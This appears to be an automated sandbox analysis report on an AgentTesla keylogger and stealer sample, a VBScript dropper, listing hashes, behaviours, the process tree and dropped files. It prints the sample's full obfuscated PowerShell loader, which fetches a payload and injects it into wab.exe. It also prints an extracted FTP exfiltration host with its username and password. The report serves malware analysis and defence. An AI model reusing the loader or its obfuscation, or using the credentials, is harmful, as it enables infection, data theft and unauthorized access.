agenttesla | 06931ce95d25b0fd0bcd5659228516279e786018c6b9344446cbda0be183471c

General

Target

PONO6188.vbs
Size

59KB
MD5

3c00879a0e4e4a7d7b78bb8611bcc94f
SHA1

3ddd2f54b7fb54df60134318515fd61b119bc46f
SHA256

94ffc7bec0cef06550d739bc5014a3232c9218a50524de0464b53b6dbbd7ed5f
SHA512

4dfce826cf9f7456dd981b4a1b4c985d75c9c849434a94c5987bd08fe037217b5160441e23072c498b5e9c93e2d00d8c6e814ea1736e68724aa461881ab1b31c
SSDEEP

1536:cdukLI1gPDPTxyk0MfFCNqnlAEfen8TCQr:Yukk1gPDJzoGaEWn8Tv

Score

10^/10

agenttesla keylogger spyware stealer trojan

Malware Config

Extracted

Family

agenttesla

Credentials

Protocol: ftp
Host:
ftp://ftp.concaribe.com
Port:
21
Username:
koko@concaribe.com
Password:
2ogFj^8ECV(?

Signatures

AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
keylogger trojan stealer spyware agenttesla
Blocklisted process makes network request 2 IoCs

Processes:

WScript.exepowershell.exe

flow pid process

3 1288 WScript.exe
8 2716 powershell.exe
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

11 api.ipify.org
12 api.ipify.org
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

Processes:

wab.exe

pid process

2344 wab.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

powershell.exewab.exe

pid process

552 powershell.exe
2344 wab.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 552 set thread context of 2344 552 powershell.exe wab.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Runs ping.exe 1 TTPs 2 IoCs

Remote System Discovery
T1018

Processes:

ping.exeping.exe

pid process

2684 ping.exe
2556 ping.exe
Suspicious behavior: EnumeratesProcesses 5 IoCs

Processes:

powershell.exepowershell.exewab.exe

pid process

2716 powershell.exe
552 powershell.exe
552 powershell.exe
2344 wab.exe
2344 wab.exe
Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

powershell.exe

pid process

552 powershell.exe
Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

powershell.exepowershell.exewab.exe

description pid process

Token: SeDebugPrivilege 2716 powershell.exe
Token: SeDebugPrivilege 552 powershell.exe
Token: SeDebugPrivilege 2344 wab.exe

flow	pid	process
3	1288	WScript.exe
8	2716	powershell.exe

flow	ioc
11	api.ipify.org
12	api.ipify.org

pid	process
2344	wab.exe

pid	process
552	powershell.exe
2344	wab.exe

description	pid	process	target process
PID 552 set thread context of 2344	552	powershell.exe	wab.exe

pid	process
2684	ping.exe
2556	ping.exe

pid	process
2716	powershell.exe
552	powershell.exe
552	powershell.exe
2344	wab.exe
2344	wab.exe

pid	process
552	powershell.exe

description	pid	process
Token: SeDebugPrivilege	2716	powershell.exe
Token: SeDebugPrivilege	552	powershell.exe
Token: SeDebugPrivilege	2344	wab.exe

Suspicious use of WriteProcessMemory 29 IoCs

Processes:

WScript.exepowershell.exepowershell.exe

description	pid	process	target process
PID 1288 wrote to memory of 2684	1288	WScript.exe	ping.exe
PID 1288 wrote to memory of 2684	1288	WScript.exe	ping.exe
PID 1288 wrote to memory of 2684	1288	WScript.exe	ping.exe
PID 1288 wrote to memory of 2556	1288	WScript.exe	ping.exe
PID 1288 wrote to memory of 2556	1288	WScript.exe	ping.exe
PID 1288 wrote to memory of 2556	1288	WScript.exe	ping.exe
PID 1288 wrote to memory of 2932	1288	WScript.exe	cmd.exe
PID 1288 wrote to memory of 2932	1288	WScript.exe	cmd.exe
PID 1288 wrote to memory of 2932	1288	WScript.exe	cmd.exe
PID 1288 wrote to memory of 2716	1288	WScript.exe	powershell.exe
PID 1288 wrote to memory of 2716	1288	WScript.exe	powershell.exe
PID 1288 wrote to memory of 2716	1288	WScript.exe	powershell.exe
PID 2716 wrote to memory of 2436	2716	powershell.exe	cmd.exe
PID 2716 wrote to memory of 2436	2716	powershell.exe	cmd.exe
PID 2716 wrote to memory of 2436	2716	powershell.exe	cmd.exe
PID 2716 wrote to memory of 552	2716	powershell.exe	powershell.exe
PID 2716 wrote to memory of 552	2716	powershell.exe	powershell.exe
PID 2716 wrote to memory of 552	2716	powershell.exe	powershell.exe
PID 2716 wrote to memory of 552	2716	powershell.exe	powershell.exe
PID 552 wrote to memory of 1128	552	powershell.exe	cmd.exe
PID 552 wrote to memory of 1128	552	powershell.exe	cmd.exe
PID 552 wrote to memory of 1128	552	powershell.exe	cmd.exe
PID 552 wrote to memory of 1128	552	powershell.exe	cmd.exe
PID 552 wrote to memory of 2344	552	powershell.exe	wab.exe
PID 552 wrote to memory of 2344	552	powershell.exe	wab.exe
PID 552 wrote to memory of 2344	552	powershell.exe	wab.exe
PID 552 wrote to memory of 2344	552	powershell.exe	wab.exe
PID 552 wrote to memory of 2344	552	powershell.exe	wab.exe
PID 552 wrote to memory of 2344	552	powershell.exe	wab.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\PONO6188.vbs"
1⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:1288

C:\Windows\System32\ping.exe
ping google.com -n 1
2⤵
- Runs ping.exe
PID:2684

C:\Windows\System32\ping.exe
ping %.%.%.%
2⤵
- Runs ping.exe
PID:2556

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir
2⤵
PID:2932

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Dragonwort = 1;$Vad='Substrin';$Vad+='g';Function Forfatterskaberne($Honnren){$Naeppe=$Honnren.Length-$Dragonwort;For($Tyndhudet=5; $Tyndhudet -lt $Naeppe; $Tyndhudet+=(6)){$Anticipants+=$Honnren.$Vad.Invoke($Tyndhudet, $Dragonwort);}$Anticipants;}function Flelsessagers167($baitfish){. ($Statsls) ($baitfish);}$Noncritical84=Forfatterskaberne 'Ni.roM D mmoGaasezBrandi N.dklFrokolMercaaSiv.n/Ensw.5Glaci. Berm0Nring Teate(ArntpWKnickiDkninnPlessdDeducoRepetwmahonsC vil KilowNP omoT,adly Sejse1Forlg0Klond.Menya0Paata;Cosse SorteW C.rei,urkin sade6P,tel4Stoni;Bysba Lettex C no6 Folk4Adhak;Fis,i weedrAabenv Voks:Capan1Res z2Nonpo1 Wird.Dront0Hasse) Inte VauntGStikle.evercVemodkErhveoNeogr/Praef2Forep0A dem1Val,i0 Held0Takt.1Nontr0R,gne1slbsa ParagFJenviiClearrRigore rullfCircuoLid oxSymme/ Band1Amfib2sho p1Minds.L.est0Tude. ';$Systemgrafs=Forfatterskaberne 'ErnriU D scs KunseA tiqrPolit-tjavsA SpndgtaxieeS.bvenArabet Dece ';$Bewhite=Forfatterskaberne 'EndanhWadmat Illat annap Gyre:Delig/ Unfl/B mbanElbiliRateft in eiDtrenoArkol. .nurcord.noRestamShoeb/ K,erk Supe2Komma/BregoUHandenWaterc ForwoPoindnshrafsPancrc.iffsiBrydne Convn.utsutPulloiJomfroUningu LodgsToolmn.etaleSpilfsVittus Gunv.Conc.jSamvrp.nddkbEndoc ';$Foelsomhed=Forfatterskaberne 'Extra>Alkoh ';$Statsls=Forfatterskaberne 'Re,nui KandeHust.x.indu ';$Soil='Bureaucratizes';Flelsessagers167 (Forfatterskaberne 'SuperSThroue Bl atEneka-Unde.CSavtaoBibl.n UbiqtRedekeEnkeln ucert Lime Has,e-forbuPkludra AdvotminimhSpl.t Mu.tiTNvnin:Kan.n\ ommeAIdeoln Pewet.jlleiAbdietNedkuyDorsipBeclio PissuBrystsImmob.MelletAlactxB nzetOverp Misfo- CincV lupuaUltralTre.muNum.eeUnive Ign,t$ uskuSmelano gleri UndelSume.; Na,u ');Flelsessagers167 (Forfatterskaberne 'MetafiMaskif Sheo Smaa(GerbrtRaneeeAcquisNitritD.mme-DivispstewaaShooptAmt fhButtl BoxinTBioxa: Gr n\futurAEthionKorrotLdervi LengtStor,y,arvepSyneroSmrreuKiwifsWebbe.Papagtendowxmisfot Citr)Hoved{ RedseDextrxtrachiTrochtDrnle}.ctor;Benda ');$Plumipede107 = Forfatterskaberne ' OmsteSqsamcTone.hLodlioProli Hvnen%snksmaUnexapDumstpRigsmdCo ntaRenipt FrigaHanke% Smil\ B.rdVKa.meeSe sur Uhe.eBranddHippoiMbirac Bildt.eget.Unprem RegiocoleouTroll S gte&Afkry&Magia F.odeNatioc N.nphPulpioPreco ulli$ Deod ';Flelsessagers167 (Forfatterskaberne 'Coe o$Inchag AsaflTriumoTrettbUngraa urfl Alun:ThaniHTab reskar,arosarrSpaentGeot.gKontrr Vrt i DyrseStoddfFakul=Dagge( Te,ecJaspimSkat,dBeeth Udst./Pr.srcOverh Dees$ OpspPAf.ikl FireuArsenmVksthinukesp Dexte DebwdAntere,rocn1Fortn0Print7Stila) .nds ');Flelsessagers167 (Forfatterskaberne ' U kr$ Vagtg TalllMagniodis.ebStockaRet.rlPseud: arisJBarder,eskfeShan nMand,= lanc$SwowmB St feUnderwBl myhmarduiT.avstCharyeCatar.KontasVildfpNaganl ggesiAle.atIndsn(No eq$PrebeFUmiacoDyk,eekonfolBlacksNordvoKolormDiscohScolee Linnd Fabr)Semig ');$Bewhite=$Jren[0];Flelsessagers167 (Forfatterskaberne 'Lokal$StrmfgUsurplWay,ioForhab mdiraHovedlOverd:Pa,peRTrakkeEr,antSubhes KampsMatchi CohokMumpikSkibseR.tirrInforhNonfeeBarled Recoe.rescnBe oos Un,e=FunicN SknneAllydwCushb-HaandONomeub ToiljV dneeJokercPorthtAphon enthrSRadixySuttes,nsubtTerateEuropmL,ndl.AutenN .rubeLamedt,etfi.Lap.aW Fr teSvmmebNedsvC DelilOm leiAcclieMareknInkast,nter ');Flelsessagers167 (Forfatterskaberne 'Bu im$TraveRBarfoe HodotImpacsO,isssTrbesidrikkk .nenkLondieE,terrFr,mbhOptraeStududK yose Da.anSm rosHete..JobsgHBaggreUnperaReinad Laere SerorDybfrswe,tb[Sprud$CoregSBri,hy,odessKnkketTryl e Cheem Phy,gLok.er ,lluaintegfTradis Alge]Unde,=Epina$UnsepNla ceoSum.onReveicMilierF.uori ommtKalifiVibr c U ifa UdpelChor.8 Eksp4Musel ');$Bakteriologierne=Forfatterskaberne 'IodhyRTrnereschn tBoucls tebastol,mi Retsku.remk PseueDialyrPo,olhLar.seCre.edStorteLim enRu,anssplit.udsmuDwarpooParn,wInsatnTjrehlCruseoOutraaNidi,dByforFHunkniUsy,llDom,meStoma(Forst$GenfoBPirojeOverrwAktivhTrindi Al.rtBllere Trou,Pupp,$ WeinsKin su QuidbE,cinjUnr.me Ag icCal ptSy thiBoo.hoAv,can efisBla,t)Unaus ';$Bakteriologierne=$Heartgrief[1]+$Bakteriologierne;$subjections=$Heartgrief[0];Flelsessagers167 (Forfatterskaberne ' Unva$Clam,gnormklGataao DekobdrninaInsiplPlect:Stym EAdfrdl VaresIchthaDrnfa= klub( Mil T Ci,ieTabansIndh,tSmuds-BrudnPGangwaStubmtGimpihDystr Comp$TelessSydgau Tranb,hospjLev.veManufc SqustVasociElecto ravenBregnsD,kke)Arbej ');while (!$Elsa) {Flelsessagers167 (Forfatterskaberne 'Si us$LyssigPulerlKlupuoVexi.bAntheaCyanolR fle:MargeN PhotoBehann .recbPowdeaTud,ksExceriEft,rnMarcigDatak3Trold5Rette=Brevf$ParoctknuserAmat,uConsteT ivi ') ;Flelsessagers167 $Bakteriologierne;Flelsessagers167 (Forfatterskaberne 'FatniS.yroatMargeao.thorSkoletDegre-stockSHu.knlShamee PotaeLsepepHo ed A,tst4Ta.ov ');Flelsessagers167 (Forfatterskaberne 'Hyb i$Denigg PerclForsvoRec,obUnodoa Dr mlReobl:malleE,ntihlS.rsosRutefaCarfa=nytes(FuldfTPhotoeEug,esR,kistAnr.t- DetrP,recoaOdon t GavshCo,ed Egmu $GormasRigs.uTilrabaglosj ArbeeStde.cBiogetKalkuiGilbeoLegemnDi,gosfusio)walis ') ;Flelsessagers167 (Forfatterskaberne ' iffe$ T.nngVkkeul Fibeo NaevbGaincaSy,telfesta:OverbF Pip,oValgfrmontelKultiyThysag StiltKnipleSprosrenga.n Tr meDelussHde s= Ence$DemisgR caglFarseoPartrbEthe.aBeaanldross:SurveVSp jdieditetTeddceRosvrlPolarlHyperaZuniarOv rci Di.tuPedotmTrumf8Bra.n9 Fert+Homil+Boate%Uter.$Hy erJFall,rBo,gie BrownWood .NonercVergeoParasuSeas nDubiotnedga ') ;$Bewhite=$Jren[$Forlygternes];}Flelsessagers167 (Forfatterskaberne ' Ra.e$Adolfg DruplVid oo jamabOplsfa,wvenl Naug:roofyfS,ercj WidieAn.jalTattidKol.i Hj.mm= Hair UnicoG Smaae tasstDr.ft-cren.CPartioAreeln WaxwtNona.eSammen.nwratEm,ti Tusch$TamelsS,rikuAtt nbPodsojHeathekommacAccentMisapi OphaoGenglnDruses irke ');Flelsessagers167 (Forfatterskaberne 'Kardi$BarspgFactol HypooF,skebWim,laAwr slKarlj:UnperI OptrmCosmomdukavaBizartNotearAfsigiLnpotk,aleauoppakl.lufseForurr ArnaiProrinProstgForbeeBedrerExter Dekon=.nnih Luzul[MotorSC.rsty,ments ProttM,kroe R stmlokal.ScythCBascioRibbenGengivEks,le .istr PrmitUnrec]Rubbi: pern:Ank.rFSolhar AcicoAndelmS,parBCremea TownsProceeLi,en6Undli4SlagsSPantstFd elrUnhomi.ectan ,enigAer n(primr$ KejsfByggrjHu oreProcolProjedUtopi)C ffe ');Flelsessagers167 (Forfatterskaberne 'Empye$,onpegGaunclQui,do AcarbKnip,aVoliplSejoi:HomunRConsueR sprcCam hoAu.itnResurtIdkoreStranmFerripAdrielunfraaLabeltUnd,riForgroForbrnMonop Flo,e= prea Subpe[CancrS UkrnyTithasHexamt iodee ForpmVselm.PinewTPondeeStagnxBreittFi,mo.KoppeEBromfnVve,ecExpenoBr,stdHushoiRapson Progg Regi]Supe.: Kolo:SeverAOilmoSMisi CV.locIs,iseIKn ge.PusseGPupate efeat SeklSSystet,peakrClituiIndren Ins.gPercu( Fors$SelvmI.entrm,arvemPolaraM.ndst,forgr Ajugi CacokKatodu Narrl RowleImperrUrpreiStagin Mod gBarnae yriarVrdig)Pimpl ');Flelsessagers167 (Forfatterskaberne 'Empir$Id,lsgMiljalBes.loVed.abPedi.a PaaflFrimu:AlecttGldspoUpstrnPrl,daZoogerNon,ut .ffie DistrStu,in ReareKmmen=,allo$NringRLaidle U.frc B fro oelnHypnotOmkrae R.hamKybelpCr.stlBlawnarepubtLingui ovioS,ijonF.yve. IdrisStemnuMora,bPallasfaithtWeekerPree,iSansenDilatg Form( Grns3Klink0Tyrek1.rveg7.rede8 Emul5.atto,ins e2Slupp8.avvr7 mbit4 K.nt7 cypr)Ov,rs ');Flelsessagers167 $tonarterne;"
2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2716

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Veredict.mou && echo $"
3⤵
PID:2436

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Dragonwort = 1;$Vad='Substrin';$Vad+='g';Function Forfatterskaberne($Honnren){$Naeppe=$Honnren.Length-$Dragonwort;For($Tyndhudet=5; $Tyndhudet -lt $Naeppe; $Tyndhudet+=(6)){$Anticipants+=$Honnren.$Vad.Invoke($Tyndhudet, $Dragonwort);}$Anticipants;}function Flelsessagers167($baitfish){. ($Statsls) ($baitfish);}$Noncritical84=Forfatterskaberne 'Ni.roM D mmoGaasezBrandi N.dklFrokolMercaaSiv.n/Ensw.5Glaci. Berm0Nring Teate(ArntpWKnickiDkninnPlessdDeducoRepetwmahonsC vil KilowNP omoT,adly Sejse1Forlg0Klond.Menya0Paata;Cosse SorteW C.rei,urkin sade6P,tel4Stoni;Bysba Lettex C no6 Folk4Adhak;Fis,i weedrAabenv Voks:Capan1Res z2Nonpo1 Wird.Dront0Hasse) Inte VauntGStikle.evercVemodkErhveoNeogr/Praef2Forep0A dem1Val,i0 Held0Takt.1Nontr0R,gne1slbsa ParagFJenviiClearrRigore rullfCircuoLid oxSymme/ Band1Amfib2sho p1Minds.L.est0Tude. ';$Systemgrafs=Forfatterskaberne 'ErnriU D scs KunseA tiqrPolit-tjavsA SpndgtaxieeS.bvenArabet Dece ';$Bewhite=Forfatterskaberne 'EndanhWadmat Illat annap Gyre:Delig/ Unfl/B mbanElbiliRateft in eiDtrenoArkol. .nurcord.noRestamShoeb/ K,erk Supe2Komma/BregoUHandenWaterc ForwoPoindnshrafsPancrc.iffsiBrydne Convn.utsutPulloiJomfroUningu LodgsToolmn.etaleSpilfsVittus Gunv.Conc.jSamvrp.nddkbEndoc ';$Foelsomhed=Forfatterskaberne 'Extra>Alkoh ';$Statsls=Forfatterskaberne 'Re,nui KandeHust.x.indu ';$Soil='Bureaucratizes';Flelsessagers167 (Forfatterskaberne 'SuperSThroue Bl atEneka-Unde.CSavtaoBibl.n UbiqtRedekeEnkeln ucert Lime Has,e-forbuPkludra AdvotminimhSpl.t Mu.tiTNvnin:Kan.n\ ommeAIdeoln Pewet.jlleiAbdietNedkuyDorsipBeclio PissuBrystsImmob.MelletAlactxB nzetOverp Misfo- CincV lupuaUltralTre.muNum.eeUnive Ign,t$ uskuSmelano gleri UndelSume.; Na,u ');Flelsessagers167 (Forfatterskaberne 'MetafiMaskif Sheo Smaa(GerbrtRaneeeAcquisNitritD.mme-DivispstewaaShooptAmt fhButtl BoxinTBioxa: Gr n\futurAEthionKorrotLdervi LengtStor,y,arvepSyneroSmrreuKiwifsWebbe.Papagtendowxmisfot Citr)Hoved{ RedseDextrxtrachiTrochtDrnle}.ctor;Benda ');$Plumipede107 = Forfatterskaberne ' OmsteSqsamcTone.hLodlioProli Hvnen%snksmaUnexapDumstpRigsmdCo ntaRenipt FrigaHanke% Smil\ B.rdVKa.meeSe sur Uhe.eBranddHippoiMbirac Bildt.eget.Unprem RegiocoleouTroll S gte&Afkry&Magia F.odeNatioc N.nphPulpioPreco ulli$ Deod ';Flelsessagers167 (Forfatterskaberne 'Coe o$Inchag AsaflTriumoTrettbUngraa urfl Alun:ThaniHTab reskar,arosarrSpaentGeot.gKontrr Vrt i DyrseStoddfFakul=Dagge( Te,ecJaspimSkat,dBeeth Udst./Pr.srcOverh Dees$ OpspPAf.ikl FireuArsenmVksthinukesp Dexte DebwdAntere,rocn1Fortn0Print7Stila) .nds ');Flelsessagers167 (Forfatterskaberne ' U kr$ Vagtg TalllMagniodis.ebStockaRet.rlPseud: arisJBarder,eskfeShan nMand,= lanc$SwowmB St feUnderwBl myhmarduiT.avstCharyeCatar.KontasVildfpNaganl ggesiAle.atIndsn(No eq$PrebeFUmiacoDyk,eekonfolBlacksNordvoKolormDiscohScolee Linnd Fabr)Semig ');$Bewhite=$Jren[0];Flelsessagers167 (Forfatterskaberne 'Lokal$StrmfgUsurplWay,ioForhab mdiraHovedlOverd:Pa,peRTrakkeEr,antSubhes KampsMatchi CohokMumpikSkibseR.tirrInforhNonfeeBarled Recoe.rescnBe oos Un,e=FunicN SknneAllydwCushb-HaandONomeub ToiljV dneeJokercPorthtAphon enthrSRadixySuttes,nsubtTerateEuropmL,ndl.AutenN .rubeLamedt,etfi.Lap.aW Fr teSvmmebNedsvC DelilOm leiAcclieMareknInkast,nter ');Flelsessagers167 (Forfatterskaberne 'Bu im$TraveRBarfoe HodotImpacsO,isssTrbesidrikkk .nenkLondieE,terrFr,mbhOptraeStududK yose Da.anSm rosHete..JobsgHBaggreUnperaReinad Laere SerorDybfrswe,tb[Sprud$CoregSBri,hy,odessKnkketTryl e Cheem Phy,gLok.er ,lluaintegfTradis Alge]Unde,=Epina$UnsepNla ceoSum.onReveicMilierF.uori ommtKalifiVibr c U ifa UdpelChor.8 Eksp4Musel ');$Bakteriologierne=Forfatterskaberne 'IodhyRTrnereschn tBoucls tebastol,mi Retsku.remk PseueDialyrPo,olhLar.seCre.edStorteLim enRu,anssplit.udsmuDwarpooParn,wInsatnTjrehlCruseoOutraaNidi,dByforFHunkniUsy,llDom,meStoma(Forst$GenfoBPirojeOverrwAktivhTrindi Al.rtBllere Trou,Pupp,$ WeinsKin su QuidbE,cinjUnr.me Ag icCal ptSy thiBoo.hoAv,can efisBla,t)Unaus ';$Bakteriologierne=$Heartgrief[1]+$Bakteriologierne;$subjections=$Heartgrief[0];Flelsessagers167 (Forfatterskaberne ' Unva$Clam,gnormklGataao DekobdrninaInsiplPlect:Stym EAdfrdl VaresIchthaDrnfa= klub( Mil T Ci,ieTabansIndh,tSmuds-BrudnPGangwaStubmtGimpihDystr Comp$TelessSydgau Tranb,hospjLev.veManufc SqustVasociElecto ravenBregnsD,kke)Arbej ');while (!$Elsa) {Flelsessagers167 (Forfatterskaberne 'Si us$LyssigPulerlKlupuoVexi.bAntheaCyanolR fle:MargeN PhotoBehann .recbPowdeaTud,ksExceriEft,rnMarcigDatak3Trold5Rette=Brevf$ParoctknuserAmat,uConsteT ivi ') ;Flelsessagers167 $Bakteriologierne;Flelsessagers167 (Forfatterskaberne 'FatniS.yroatMargeao.thorSkoletDegre-stockSHu.knlShamee PotaeLsepepHo ed A,tst4Ta.ov ');Flelsessagers167 (Forfatterskaberne 'Hyb i$Denigg PerclForsvoRec,obUnodoa Dr mlReobl:malleE,ntihlS.rsosRutefaCarfa=nytes(FuldfTPhotoeEug,esR,kistAnr.t- DetrP,recoaOdon t GavshCo,ed Egmu $GormasRigs.uTilrabaglosj ArbeeStde.cBiogetKalkuiGilbeoLegemnDi,gosfusio)walis ') ;Flelsessagers167 (Forfatterskaberne ' iffe$ T.nngVkkeul Fibeo NaevbGaincaSy,telfesta:OverbF Pip,oValgfrmontelKultiyThysag StiltKnipleSprosrenga.n Tr meDelussHde s= Ence$DemisgR caglFarseoPartrbEthe.aBeaanldross:SurveVSp jdieditetTeddceRosvrlPolarlHyperaZuniarOv rci Di.tuPedotmTrumf8Bra.n9 Fert+Homil+Boate%Uter.$Hy erJFall,rBo,gie BrownWood .NonercVergeoParasuSeas nDubiotnedga ') ;$Bewhite=$Jren[$Forlygternes];}Flelsessagers167 (Forfatterskaberne ' Ra.e$Adolfg DruplVid oo jamabOplsfa,wvenl Naug:roofyfS,ercj WidieAn.jalTattidKol.i Hj.mm= Hair UnicoG Smaae tasstDr.ft-cren.CPartioAreeln WaxwtNona.eSammen.nwratEm,ti Tusch$TamelsS,rikuAtt nbPodsojHeathekommacAccentMisapi OphaoGenglnDruses irke ');Flelsessagers167 (Forfatterskaberne 'Kardi$BarspgFactol HypooF,skebWim,laAwr slKarlj:UnperI OptrmCosmomdukavaBizartNotearAfsigiLnpotk,aleauoppakl.lufseForurr ArnaiProrinProstgForbeeBedrerExter Dekon=.nnih Luzul[MotorSC.rsty,ments ProttM,kroe R stmlokal.ScythCBascioRibbenGengivEks,le .istr PrmitUnrec]Rubbi: pern:Ank.rFSolhar AcicoAndelmS,parBCremea TownsProceeLi,en6Undli4SlagsSPantstFd elrUnhomi.ectan ,enigAer n(primr$ KejsfByggrjHu oreProcolProjedUtopi)C ffe ');Flelsessagers167 (Forfatterskaberne 'Empye$,onpegGaunclQui,do AcarbKnip,aVoliplSejoi:HomunRConsueR sprcCam hoAu.itnResurtIdkoreStranmFerripAdrielunfraaLabeltUnd,riForgroForbrnMonop Flo,e= prea Subpe[CancrS UkrnyTithasHexamt iodee ForpmVselm.PinewTPondeeStagnxBreittFi,mo.KoppeEBromfnVve,ecExpenoBr,stdHushoiRapson Progg Regi]Supe.: Kolo:SeverAOilmoSMisi CV.locIs,iseIKn ge.PusseGPupate efeat SeklSSystet,peakrClituiIndren Ins.gPercu( Fors$SelvmI.entrm,arvemPolaraM.ndst,forgr Ajugi CacokKatodu Narrl RowleImperrUrpreiStagin Mod gBarnae yriarVrdig)Pimpl ');Flelsessagers167 (Forfatterskaberne 'Empir$Id,lsgMiljalBes.loVed.abPedi.a PaaflFrimu:AlecttGldspoUpstrnPrl,daZoogerNon,ut .ffie DistrStu,in ReareKmmen=,allo$NringRLaidle U.frc B fro oelnHypnotOmkrae R.hamKybelpCr.stlBlawnarepubtLingui ovioS,ijonF.yve. IdrisStemnuMora,bPallasfaithtWeekerPree,iSansenDilatg Form( Grns3Klink0Tyrek1.rveg7.rede8 Emul5.atto,ins e2Slupp8.avvr7 mbit4 K.nt7 cypr)Ov,rs ');Flelsessagers167 $tonarterne;"
3⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:552

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Veredict.mou && echo $"
4⤵
PID:1128

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
4⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2344

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Remote System Discovery

1

T1018

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\65412SJE0JSWNN0NVWJB.temp
Filesize
7KB

MD5
0d7f53cd6bc4e83ac845de1204af8711

SHA1
73b24bb7e31b11641701d1f56db9bee6d99aa6f2

SHA256
9b3d748b38c240b78f8d94ee3537e44a24b3bb42ada76170bb1a514b02d72529

SHA512
453aad2aad18bf8f2de4b5975b18a814b97e2f2aa82edb469fe7e540fee4857871e89fabac6c9249092e51051c0ac4fe0ab792d785c8f38e5d8c57dd5190702a

Download Submit
C:\Users\Admin\AppData\Roaming\Veredict.mou
Filesize
430KB

MD5
446bd53386a67b6e402c67f8077b3a9e

SHA1
11d006e1c77dddfff4559bef35ec15bd01fb8cbc

SHA256
85f74a4e42fd58c712bfce653b8eb1d71c57793e22daf9529c7c916c4660dfc4

SHA512
1afae58e5cbedc6c2aaa7779bb9217f1cf00aff240a9bdbdc41394a30cc1bd59181a83c8fd62fb636d34b0be41cb8a277c64c9126d52881324cbcff27753e838

Download Submit
memory/552-28-0x0000000006060000-0x000000000A38F000-memory.dmp

Filesize
67.2MB

Download
memory/2344-31-0x00000000002E0000-0x0000000001342000-memory.dmp

Filesize
16.4MB

Download
memory/2344-32-0x00000000002E0000-0x0000000001342000-memory.dmp

Filesize
16.4MB

Download
memory/2344-33-0x00000000002E0000-0x0000000000322000-memory.dmp

Filesize
264KB

Download
memory/2716-21-0x000000001B2E0000-0x000000001B5C2000-memory.dmp

Filesize
2.9MB

Download
memory/2716-22-0x0000000002310000-0x0000000002318000-memory.dmp

Filesize
32KB

Download

Analysis

Sharing